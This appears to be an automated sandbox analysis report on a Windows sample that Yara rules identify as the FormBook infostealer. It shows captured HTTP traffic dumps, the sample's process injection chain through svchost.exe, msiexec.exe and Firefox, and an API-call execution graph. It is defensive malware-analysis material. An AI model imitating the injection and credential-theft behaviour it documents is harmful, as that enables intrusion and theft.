                                                                                                              Nov 5, 2024 15:39:07.534876108 CET1289INData Raw: 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74
                                                                                                              Data Ascii: 0%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A;
                                                                                                              Nov 5, 2024 15:39:07.534919024 CET1289INData Raw: 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30
                                                                                                              Data Ascii: text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0;
                                                                                                              Nov 5, 2024 15:39:07.534960985 CET1289INData Raw: 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: : 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; }
                                                                                                              Nov 5, 2024 15:39:07.535002947 CET1289INData Raw: 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f
                                                                                                              Data Ascii: fRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4
                                                                                                              Nov 5, 2024 15:39:07.535043955 CET1289INData Raw: 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e 74 45 55 4b 58 47 43 39 35 6a 4b 2b 52 67 34 51 42 56 77 4e 6d 6c 65 50 5a 56 6a 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f
                                                                                                              Data Ascii: 7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQ
                                                                                                              Nov 5, 2024 15:39:07.535087109 CET1289INData Raw: 61 70 69 34 34 72 46 70 66 71 54 5a 41 6e 57 2b 4a 46 52 47 33 6b 66 39 34 5a 2b 73 53 71 64 52 31 55 49 69 49 2f 64 63 2f 42 36 4e 2f 4d 39 57 73 69 41 44 4f 30 30 41 33 51 55 30 68 6f 68 58 35 52 54 64 65 43 72 73 74 79 54 31 57 70 68 55 52 54
                                                                                                              Data Ascii: api44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr27
                                                                                                              Nov 5, 2024 15:39:07.535130978 CET1289INData Raw: 64 6f 63 75 6d 65 6e 74 2e 73 68 74 6d 6c 20 70 6f 72 74 20 38 30 20 6f 6e 20 54 75 65 73 64 61 79 2c 20 30 35 2d 4e 6f 76 2d 32 30 32 34 20 30 39 3a 33 39 3a 30 37 20 45 53 54 22 3e 20 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 20 20 20 20 20
                                                                                                              Data Ascii: document.shtml port 80 on Tuesday, 05-Nov-2024 09:39:07 EST"> WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="additional-info">
                                                                                                              Nov 5, 2024 15:39:07.535160065 CET11INData Raw: 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: ml>0


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:09:32:48
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Users\user\Desktop\p4rsJEIb7k.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\p4rsJEIb7k.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:1'335'565 bytes
                                                                                                              MD5 hash:159AFC06A66A86F332BE92F52963B09E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:1
                                                                                                              Start time:09:32:50
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\p4rsJEIb7k.exe"
                                                                                                              Imagebase:0x1a0000
                                                                                                              File size:47'016 bytes
                                                                                                              MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:2
                                                                                                              Start time:09:33:31
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe"
                                                                                                              Imagebase:0xab0000
                                                                                                              File size:140'800 bytes
                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:09:33:33
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                              Imagebase:0xdd0000
                                                                                                              File size:59'904 bytes
                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:09:33:58
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                              Imagebase:0x7ff793270000
                                                                                                              File size:597'432 bytes
                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:3%
                                                                                                                Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                Signature Coverage:3.3%
                                                                                                                Total number of Nodes:1594
                                                                                                                Total number of Limit Nodes:41
                                                                                                                execution_graph 84916 4444e4 84921 40d900 84916->84921 84918 4444ee 84925 43723d 84918->84925 84920 444504 84922 40d917 84921->84922 84923 40d909 84921->84923 84922->84923 84924 40d91c CloseHandle 84922->84924 84923->84918 84924->84918 84926 40d900 CloseHandle 84925->84926 84927 437247 84926->84927 84927->84920 84928 444343 84931 444326 84928->84931 84930 44434e WriteFile 84932 444340 84931->84932 84933 4442c7 84931->84933 84932->84930 84938 40e190 SetFilePointerEx 84933->84938 84935 4442e0 SetFilePointerEx 84939 40e190 SetFilePointerEx 84935->84939 84937 4442ff 84937->84930 84938->84935 84939->84937 84940 46d22f 84943 46d098 84940->84943 84942 46d241 84944 46d0b5 84943->84944 84945 46d115 84944->84945 84946 46d0b9 84944->84946 85010 45c216 77 API calls 84945->85010 84987 41171a 84946->84987 84950 46d126 84952 46d0f8 84950->84952 84958 46d142 84950->84958 84951 46d0cc 85000 453063 84951->85000 85006 4092c0 84952->85006 84955 46d0fd 84955->84942 84959 46d1c8 84958->84959 84962 46d158 84958->84962 85016 4676a3 77 API calls 84959->85016 84965 453063 110 API calls 84962->84965 84963 46d0ea 84963->84958 84966 46d0ee 84963->84966 84964 46d1ce 85017 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84964->85017 84974 46d15e 84965->84974 84966->84952 85005 44ade5 CloseHandle 84966->85005 84967 46d18d 85011 467fce 81 API calls 84967->85011 84971 46d196 85012 4013a0 74 API calls 84971->85012 84972 46d1e7 84976 4092c0 VariantClear 84972->84976 84979 46d194 84972->84979 84974->84967 84974->84971 84975 46d1a2 85013 40df50 74 API calls 84975->85013 84976->84979 84978 46d1ac 85014 40d3b0 74 API calls 84978->85014 84981 46d224 84979->84981 84982 40d900 CloseHandle 84979->84982 84981->84942 84984 46d216 84982->84984 84983 46d1b8 85015 467fce 81 API calls 84983->85015 85018 44ade5 CloseHandle 84984->85018 84989 411724 84987->84989 84990 41173e 84989->84990 84994 411740 84989->84994 85019 4138ba 84989->85019 85037 411afc 6 API calls 84989->85037 84990->84951 84999 40d940 75 API calls 84990->84999 84992 411766 85041 4116fd 66 API calls 84992->85041 84994->84992 85038 411421 84994->85038 84995 411770 85042 41805b RaiseException 84995->85042 84998 41177e 84999->84951 85001 45306e 85000->85001 85002 45307a 85000->85002 85001->85002 85180 452e2a 110 API calls 85001->85180 85004 40dfa0 82 API calls 85002->85004 85004->84963 85005->84952 85007 4092c8 85006->85007 85008 429db0 VariantClear 85007->85008 85009 4092d5 85007->85009 85008->85009 85009->84955 85010->84950 85011->84979 85012->84975 85013->84978 85014->84983 85015->84979 85016->84964 85017->84972 85018->84981 85020 41396d 85019->85020 85030 4138cc 85019->85030 85050 411afc 6 API calls 85020->85050 85022 413973 85051 417f23 66 API calls 85022->85051 85027 413929 RtlAllocateHeap 85027->85030 85028 4138dd 85028->85030 85043 418252 66 API calls 85028->85043 85044 4180a7 66 API calls 85028->85044 85045 411803 GetModuleHandleW GetProcAddress ExitProcess 85028->85045 85030->85027 85030->85028 85031 413959 85030->85031 85034 41395e 85030->85034 85036 413965 85030->85036 85046 41386b 66 API calls 85030->85046 85047 411afc 6 API calls 85030->85047 85048 417f23 66 API calls 85031->85048 85049 417f23 66 API calls 85034->85049 85036->84989 85037->84989 85052 4113e5 85038->85052 85040 41142e 85040->84992 85041->84995 85042->84998 85043->85028 85044->85028 85046->85030 85047->85030 85048->85034 85049->85036 85050->85022 85051->85036 85053 4113f1 85052->85053 85060 41181b 85053->85060 85059 411412 85059->85040 85086 418407 85060->85086 85062 4113f6 85063 4112fa 85062->85063 85151 4169e9 TlsGetValue 85063->85151 85066 4169e9 6 API calls 85067 41131e 85066->85067 85077 4113a1 85067->85077 85161 4170e7 67 API calls 85067->85161 85069 41133c 85071 411357 85069->85071 85072 411366 85069->85072 85082 411388 85069->85082 85070 41696e 6 API calls 85073 411396 85070->85073 85162 417047 72 API calls 85071->85162 85075 411360 85072->85075 85072->85077 85076 41696e 6 API calls 85073->85076 85075->85072 85079 41137c 85075->85079 85163 417047 72 API calls 85075->85163 85076->85077 85083 41141b 85077->85083 85164 41696e TlsGetValue 85079->85164 85080 411376 85080->85077 85080->85079 85082->85070 85176 411824 85083->85176 85087 41841c 85086->85087 85088 41842f EnterCriticalSection 85086->85088 85093 418344 85087->85093 85088->85062 85090 418422 85090->85088 85121 4117af 66 API calls 85090->85121 85092 41842e 85092->85088 85094 418350 85093->85094 85095 418360 85094->85095 85096 418378 85094->85096 85122 418252 66 API calls 85095->85122 85104 418386 85096->85104 85125 416fb6 85096->85125 85099 418365 85123 4180a7 66 API calls 85099->85123 85102 4183a7 85107 418407 66 API calls 85102->85107 85103 418398 85131 417f23 66 API calls 85103->85131 85104->85090 85105 41836c 85124 411803 GetModuleHandleW GetProcAddress ExitProcess 85105->85124 85109 4183ae 85107->85109 85111 4183e2 85109->85111 85112 4183b6 85109->85112 85113 413a88 66 API calls 85111->85113 85132 4189e6 InitializeCriticalSectionAndSpinCount 85112->85132 85115 4183d3 85113->85115 85147 4183fe LeaveCriticalSection 85115->85147 85116 4183c1 85116->85115 85133 413a88 85116->85133 85119 4183cd 85146 417f23 66 API calls 85119->85146 85121->85092 85122->85099 85123->85105 85128 416fbf 85125->85128 85126 4138ba 65 API calls 85126->85128 85127 416ff5 85127->85102 85127->85103 85128->85126 85128->85127 85129 416fd6 Sleep 85128->85129 85130 416feb 85129->85130 85130->85127 85130->85128 85131->85104 85132->85116 85134 413a94 85133->85134 85136 418407 64 API calls 85134->85136 85142 413b0d 85134->85142 85145 413ad3 85134->85145 85135 413ae8 RtlFreeHeap 85137 413afa 85135->85137 85135->85142 85141 413aab 85136->85141 85150 417f23 66 API calls 85137->85150 85139 413aff GetLastError 85139->85142 85140 413ac5 85149 413ade LeaveCriticalSection 85140->85149 85141->85140 85148 419f9d VirtualFree VirtualFree HeapFree 85141->85148 85142->85119 85145->85135 85145->85142 85146->85115 85147->85104 85148->85140 85149->85145 85150->85139 85152 416a01 85151->85152 85153 416a22 GetModuleHandleW 85151->85153 85152->85153 85154 416a0b TlsGetValue 85152->85154 85155 416a32 85153->85155 85156 416a3d GetProcAddress 85153->85156 85159 416a16 85154->85159 85174 41177f Sleep GetModuleHandleW 85155->85174 85158 41130e 85156->85158 85158->85066 85159->85153 85159->85158 85160 416a38 85160->85156 85160->85158 85161->85069 85162->85075 85163->85080 85165 4169a7 GetModuleHandleW 85164->85165 85166 416986 85164->85166 85167 4169c2 GetProcAddress 85165->85167 85168 4169b7 85165->85168 85166->85165 85169 416990 TlsGetValue 85166->85169 85173 41699f 85167->85173 85175 41177f Sleep GetModuleHandleW 85168->85175 85172 41699b 85169->85172 85171 4169bd 85171->85167 85171->85173 85172->85165 85172->85173 85173->85082 85174->85160 85175->85171 85179 41832d LeaveCriticalSection 85176->85179 85178 411420 85178->85059 85179->85178 85180->85002 85181 40116e 85182 401119 DefWindowProcW 85181->85182 85183 40f110 RegOpenKeyExW 85184 40f13c RegQueryValueExW RegCloseKey 85183->85184 85185 40f15f 85183->85185 85184->85185 85186 429212 85191 410b90 85186->85191 85189 411421 73 API calls 85190 42922f 85189->85190 85192 410b9a 85191->85192 85193 41171a 74 API calls 85192->85193 85194 410c31 GetModuleFileNameW 85193->85194 85208 413db0 85194->85208 85196 410c66 85211 413e3c 85196->85211 85199 41171a 74 API calls 85200 410ca3 85199->85200 85201 410cd1 RegOpenKeyExW 85200->85201 85202 429bc3 RegQueryValueExW 85201->85202 85203 410cf7 85201->85203 85204 429cd9 RegCloseKey 85202->85204 85206 429bf2 85202->85206 85203->85189 85205 41171a 74 API calls 85205->85206 85206->85205 85207 429cd8 85206->85207 85207->85204 85214 413b95 85208->85214 85244 41abec 85211->85244 85215 413c2f 85214->85215 85221 413bae 85214->85221 85216 413d60 85215->85216 85217 413d7b 85215->85217 85240 417f23 66 API calls 85216->85240 85242 417f23 66 API calls 85217->85242 85220 413d65 85223 413cfb 85220->85223 85241 417ebb 6 API calls 85220->85241 85221->85215 85224 413c1d 85221->85224 85236 41ab19 66 API calls 85221->85236 85223->85196 85224->85215 85232 413c9b 85224->85232 85237 41ab19 66 API calls 85224->85237 85226 413d03 85226->85215 85226->85223 85228 413d8e 85226->85228 85227 413cb9 85227->85215 85233 413cd6 85227->85233 85238 41ab19 66 API calls 85227->85238 85243 41ab19 66 API calls 85228->85243 85231 413cef 85239 41ab19 66 API calls 85231->85239 85232->85226 85232->85227 85233->85215 85233->85223 85233->85231 85236->85224 85237->85232 85238->85233 85239->85223 85240->85220 85242->85220 85243->85223 85245 41ac02 85244->85245 85246 41abfd 85244->85246 85253 417f23 66 API calls 85245->85253 85246->85245 85249 41ac22 85246->85249 85248 41ac07 85254 417ebb 6 API calls 85248->85254 85251 410c99 85249->85251 85255 417f23 66 API calls 85249->85255 85251->85199 85253->85248 85255->85248 85256 401230 85257 401241 85256->85257 85258 4012c5 85256->85258 85271 401be0 85257->85271 85260 40126b 85261 4012ae KillTimer SetTimer 85260->85261 85262 42aa61 85260->85262 85263 401298 85260->85263 85261->85258 85266 42aa8b Shell_NotifyIconW 85262->85266 85267 42aa69 Shell_NotifyIconW 85262->85267 85264 4012a2 85263->85264 85265 42aaac 85263->85265 85264->85261 85268 42aaf8 Shell_NotifyIconW 85264->85268 85269 42aad7 Shell_NotifyIconW 85265->85269 85270 42aab5 Shell_NotifyIconW 85265->85270 85266->85261 85267->85261 85268->85261 85269->85261 85270->85261 85272 401bfb 85271->85272 85292 401cde 85271->85292 85293 4013a0 74 API calls 85272->85293 85274 401c0b 85275 42a9a0 LoadStringW 85274->85275 85276 401c18 85274->85276 85278 42a9bb 85275->85278 85294 4021e0 85276->85294 85307 40df50 74 API calls 85278->85307 85279 401c2d 85281 401c3a 85279->85281 85282 42a9cd 85279->85282 85281->85278 85283 401c44 85281->85283 85308 40d3b0 74 API calls 85282->85308 85306 40d3b0 74 API calls 85283->85306 85286 42a9dc 85287 401c53 85286->85287 85288 42a9f0 85286->85288 85291 401cc2 Shell_NotifyIconW 85287->85291 85309 40d3b0 74 API calls 85288->85309 85290 42a9fe 85291->85292 85292->85260 85293->85274 85295 4021f1 85294->85295 85296 42a598 85294->85296 85299 402205 85295->85299 85300 402226 85295->85300 85312 40c740 85296->85312 85298 42a5a2 85310 404020 74 API calls 85299->85310 85311 401380 74 API calls 85300->85311 85303 40220c 85303->85279 85304 40222d 85304->85298 85305 41171a 74 API calls 85304->85305 85305->85303 85306->85287 85307->85287 85308->85286 85309->85290 85310->85303 85311->85304 85313 40c752 85312->85313 85314 40c747 85312->85314 85313->85298 85314->85313 85317 402ae0 74 API calls 85314->85317 85316 42a572 85316->85298 85317->85316 85318 4034b0 85319 4034b9 85318->85319 85320 4034bd 85318->85320 85321 42a0ba 85320->85321 85322 41171a 74 API calls 85320->85322 85323 4034fe 85322->85323 85324 416193 85361 41718c 85324->85361 85326 41619f GetStartupInfoW 85328 4161c2 85326->85328 85362 41aa31 HeapCreate 85328->85362 85330 416212 85364 416e29 GetModuleHandleW 85330->85364 85334 416223 85398 41b669 85334->85398 85337 416231 85338 41623d GetCommandLineW 85337->85338 85467 4117af 66 API calls 85337->85467 85413 42235f GetEnvironmentStringsW 85338->85413 85341 41623c 85341->85338 85342 41624c 85419 4222b1 GetModuleFileNameW 85342->85419 85344 416256 85345 416261 85344->85345 85468 4117af 66 API calls 85344->85468 85423 422082 85345->85423 85351 416272 85436 41186e 85351->85436 85352 416279 85354 416284 85352->85354 85470 4117af 66 API calls 85352->85470 85442 40d7f0 85354->85442 85357 4162b3 85472 411a4b 66 API calls 85357->85472 85360 4162b8 85361->85326 85363 416206 85362->85363 85363->85330 85465 41616a 66 API calls 85363->85465 85365 416e44 85364->85365 85366 416e3d 85364->85366 85368 416fac 85365->85368 85369 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85365->85369 85473 41177f Sleep GetModuleHandleW 85366->85473 85483 416ad5 69 API calls 85368->85483 85372 416e97 TlsAlloc 85369->85372 85371 416e43 85371->85365 85374 416218 85372->85374 85375 416ee5 TlsSetValue 85372->85375 85374->85334 85466 41616a 66 API calls 85374->85466 85375->85374 85376 416ef6 85375->85376 85474 411a69 6 API calls 85376->85474 85378 416efb 85379 41696e 6 API calls 85378->85379 85380 416f06 85379->85380 85381 41696e 6 API calls 85380->85381 85382 416f16 85381->85382 85383 41696e 6 API calls 85382->85383 85384 416f26 85383->85384 85385 41696e 6 API calls 85384->85385 85386 416f36 85385->85386 85475 41828b InitializeCriticalSectionAndSpinCount 85386->85475 85388 416f43 85388->85368 85389 4169e9 6 API calls 85388->85389 85390 416f57 85389->85390 85390->85368 85476 416ffb 85390->85476 85393 4169e9 6 API calls 85394 416f8a 85393->85394 85394->85368 85395 416f91 85394->85395 85482 416b12 66 API calls 85395->85482 85397 416f99 GetCurrentThreadId 85397->85374 85502 41718c 85398->85502 85400 41b675 GetStartupInfoA 85401 416ffb 66 API calls 85400->85401 85408 41b696 85401->85408 85402 41b8b4 85402->85337 85403 41b831 GetStdHandle 85407 41b7fb 85403->85407 85404 41b896 SetHandleCount 85404->85402 85405 416ffb 66 API calls 85405->85408 85406 41b843 GetFileType 85406->85407 85407->85402 85407->85403 85407->85404 85407->85406 85504 4189e6 InitializeCriticalSectionAndSpinCount 85407->85504 85408->85402 85408->85405 85408->85407 85409 41b77e 85408->85409 85409->85402 85409->85407 85410 41b7a7 GetFileType 85409->85410 85503 4189e6 InitializeCriticalSectionAndSpinCount 85409->85503 85410->85409 85414 422370 85413->85414 85415 422374 85413->85415 85414->85342 85416 416fb6 66 API calls 85415->85416 85417 422395 85416->85417 85418 42239c FreeEnvironmentStringsW 85417->85418 85418->85342 85420 4222e6 85419->85420 85421 416fb6 66 API calls 85420->85421 85422 422329 85420->85422 85421->85422 85422->85344 85424 42209a 85423->85424 85427 416267 85423->85427 85425 416ffb 66 API calls 85424->85425 85426 4220be 85425->85426 85426->85427 85428 422123 85426->85428 85430 416ffb 66 API calls 85426->85430 85431 422149 85426->85431 85434 422108 85426->85434 85505 426349 66 API calls 85426->85505 85427->85351 85469 4117af 66 API calls 85427->85469 85429 413a88 66 API calls 85428->85429 85429->85427 85430->85426 85432 413a88 66 API calls 85431->85432 85432->85427 85434->85426 85506 417d93 10 API calls 85434->85506 85437 41187c 85436->85437 85507 418486 85437->85507 85439 41189a 85440 411421 73 API calls 85439->85440 85441 4118b9 85439->85441 85440->85441 85441->85352 85443 431bcb 85442->85443 85444 40d80c 85442->85444 85445 4092c0 VariantClear 85444->85445 85446 40d847 85445->85446 85511 40eb50 85446->85511 85449 40d877 85514 411ac6 66 API calls 85449->85514 85452 40d888 85515 411b24 66 API calls 85452->85515 85454 40d891 85516 40f370 SystemParametersInfoW SystemParametersInfoW 85454->85516 85456 40d89f 85517 40d6d0 GetCurrentDirectoryW 85456->85517 85458 40d8a7 SystemParametersInfoW 85459 40d8d4 85458->85459 85460 40d8cd FreeLibrary 85458->85460 85461 4092c0 VariantClear 85459->85461 85460->85459 85462 40d8dd 85461->85462 85463 4092c0 VariantClear 85462->85463 85464 40d8e6 85463->85464 85464->85357 85471 411a1f 66 API calls 85464->85471 85465->85330 85466->85334 85467->85341 85468->85345 85469->85351 85470->85354 85471->85357 85472->85360 85473->85371 85474->85378 85475->85388 85477 417004 85476->85477 85479 416f70 85477->85479 85480 417022 Sleep 85477->85480 85484 422452 85477->85484 85479->85368 85479->85393 85481 417037 85480->85481 85481->85477 85481->85479 85482->85397 85483->85374 85485 42245e 85484->85485 85486 422476 85485->85486 85496 422495 85485->85496 85497 417f23 66 API calls 85486->85497 85488 42247b 85498 417ebb 6 API calls 85488->85498 85490 422507 HeapAlloc 85490->85496 85492 418407 65 API calls 85492->85496 85493 42248b 85493->85477 85496->85490 85496->85492 85496->85493 85499 41a74c HeapReAlloc HeapAlloc VirtualAlloc HeapFree VirtualAlloc 85496->85499 85500 42254e LeaveCriticalSection 85496->85500 85501 411afc 6 API calls 85496->85501 85497->85488 85499->85496 85500->85496 85501->85496 85502->85400 85503->85409 85504->85407 85505->85426 85506->85434 85508 41848c 85507->85508 85509 41696e 6 API calls 85508->85509 85510 4184a4 85508->85510 85509->85508 85510->85439 85555 40eb70 85511->85555 85514->85452 85515->85454 85516->85456 85559 401f80 85517->85559 85519 40d6f1 IsDebuggerPresent 85520 431a9d MessageBoxA 85519->85520 85521 40d6ff 85519->85521 85522 431ab6 85520->85522 85521->85522 85523 40d71f 85521->85523 85652 403e90 74 API calls 85522->85652 85629 40f3b0 85523->85629 85527 40d73a GetFullPathNameW 85649 401440 126 API calls 85527->85649 85529 40d77a 85530 40d782 85529->85530 85531 431b09 SetCurrentDirectoryW 85529->85531 85532 40d78b 85530->85532 85653 43604b 6 API calls 85530->85653 85531->85530 85641 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85532->85641 85535 431b28 85535->85532 85537 431b30 GetModuleFileNameW 85535->85537 85539 431ba4 GetForegroundWindow ShellExecuteW 85537->85539 85540 431b4c 85537->85540 85542 40d7c7 85539->85542 85654 401b70 74 API calls 85540->85654 85541 40d795 85548 40d7a8 85541->85548 85650 40e1e0 96 API calls 85541->85650 85546 40d7d1 SetCurrentDirectoryW 85542->85546 85544 431b5a 85655 40d3b0 74 API calls 85544->85655 85546->85458 85548->85542 85651 401000 Shell_NotifyIconW 85548->85651 85549 431b66 85656 40d3b0 74 API calls 85549->85656 85552 431b72 GetForegroundWindow ShellExecuteW 85553 431b9f 85552->85553 85553->85542 85554 40eba0 LoadLibraryA GetProcAddress 85554->85449 85556 40d86e 85555->85556 85557 40eb76 LoadLibraryA 85555->85557 85556->85449 85556->85554 85557->85556 85558 40eb87 GetProcAddress 85557->85558 85558->85556 85657 40e680 74 API calls 85559->85657 85561 401f90 85658 402940 74 API calls 85561->85658 85563 401fa2 GetModuleFileNameW 85659 40ff90 85563->85659 